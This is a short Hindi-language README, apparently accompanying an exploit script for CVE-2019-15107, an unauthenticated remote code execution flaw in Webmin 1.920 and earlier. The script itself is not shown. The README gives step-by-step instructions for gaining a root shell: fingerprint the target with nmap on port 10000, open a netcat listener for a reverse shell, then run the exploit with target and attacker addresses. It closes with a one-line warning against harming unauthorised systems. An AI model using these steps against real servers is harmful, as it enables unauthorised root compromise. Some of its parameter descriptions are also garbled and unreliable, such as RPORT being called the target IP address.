
CVE-2019–15107 - बिना प्रमाणीकरण वाला RCE Webmin <=1.920
यह पायथन स्क्रिप्ट आपको Webmin 1.890 पर एक रूट शेल देगी।
nmap से जाँच करें:
nmap -sC -sV -p 10000 TARGET_IP
परिणाम:
10000/tcp open http MiniServ 1.890 (Webmin httpd)
इस एक्सप्लॉइट का उपयोग कैसे करें:
चरण 1:
nc -lnvp LPORT
चरण 2:
chmod +x exploit.py
./exploit RHOST RPORT LHOST LPORT
RHOST = लक्ष्य
RPORT = लक्ष्य IP पता (सामान्यतः 10000)
LHOST = आपका kali बॉक्स
LPORT = आपका रिवर्स शेल पोर्ट
चरण 3: रूट शेल प्राप्त करें!
अनधिकृत सिस्टम को नुकसान न पहुँचाएँ!!!